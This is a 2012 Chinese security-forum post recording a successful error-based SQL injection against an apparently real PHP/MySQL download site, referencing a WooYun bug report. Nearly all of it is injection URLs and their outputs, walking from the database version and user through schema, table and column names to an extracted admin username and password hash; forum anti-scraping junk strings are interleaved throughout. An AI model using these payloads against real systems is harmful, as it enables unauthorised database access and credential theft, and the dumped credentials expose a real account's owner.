找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2050|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
9 C. M( i2 H6 @7 s: m& {& B
- h6 d; H% V% ?( I, G之前想找个测试 没想到这有 可以测试下做个记录而已
7 s, d5 A5 \, q3 h
0 G: X' `* s$ z6 E7 _' y6 bhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
: a, A  {. W; L, r2 z0 x
: k) W% ~6 f$ L/data0/htdocs/leqi_new/app/myapp.php
, J* Q. I6 A0 V* S3 d
; k7 e8 F! l, y1 T! o 或者6 ]0 l' m! Y1 [% F& U8 p
" E) A- I5 B8 ]" D
/**********version()**********/ 5.1.49-log
: f7 i% J0 m  Z+ v5 Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* e' e* M6 a! \0 B0 z5 H% M5 M) X3 P

. @: ^& I2 i7 x/**********user()**********/  
' v. H' K& H2 {* Y. Ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 C# x, A  i5 {+ W( o

% x* T4 g2 N3 f, z. N/**********database()**********/  leqi1 r% b) B1 {# W( N4 P. A* H2 _6 {
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 \" }- A  F( M1 Z/ j1 @

4 J8 e+ h( p8 U  D  Z( ?/**********limit依次递归爆库**********/: M( q, f5 ~$ V
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. T0 ^6 N; n' Z& [8 h7 h* D/ ^! |) y. ?information_schema
* v; `$ G5 `7 @8 g- ?1 E% hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. n( X: E- W# ^$ T9 f
leqi3 T) o7 K% E( l; D: O- f2 _
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003$ [. j3 T  j5 D8 d0 `5 T- n# K
test
% w1 J1 L! C- v7 o$ }( [+ ]/ i, o. A: }1 `/ \4 j+ U: A
/**********limit依次递归爆表名**********/
, S% a! y4 b0 xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0037 V% O* \9 f& @/ z
users
5 `- H3 Y% i# ^. Z, Y3 s7 h" x8 F: B5 N3 v. e1 U2 [0 V6 E
/**********limit依次递归爆字段名**********/. a* d7 J6 T" C
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% `% `( z; F5 O. m- ~3 o
user_id,username,nickname,passwd,group_id. ^( d; h0 p6 c( I# I; N/ E
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%231 d9 K) X; `1 O* Z$ A( B  B
/wapc/5000_0005_003
* [7 x0 \; h7 K3 X; S11 215 I/ O4 h' q- J- P/ J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23* S0 L- x/ P/ p  h  u! Z6 f
/wapc/5000_0005_003
; b0 O' |% h# b11 341 351 361
9 |" W! c1 U0 ^2 x, @2 d5 {/**********爆数据**********/
# `# y# \8 q, Y0 O" c1 e. O* Ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23+ e1 ^; G4 G: _4 q* {
admin6 A9 }) c# A7 w
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23+ Q, T% R3 n( i. g3 Q) `) H
6a8b4574ca231eb8bd52764d4978ffcd- T) J$ A% H* R% C4 v

+ Y4 M6 e  n% B# o/ l, p9 }7 D  V' _
  x/ P* _6 ~: ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表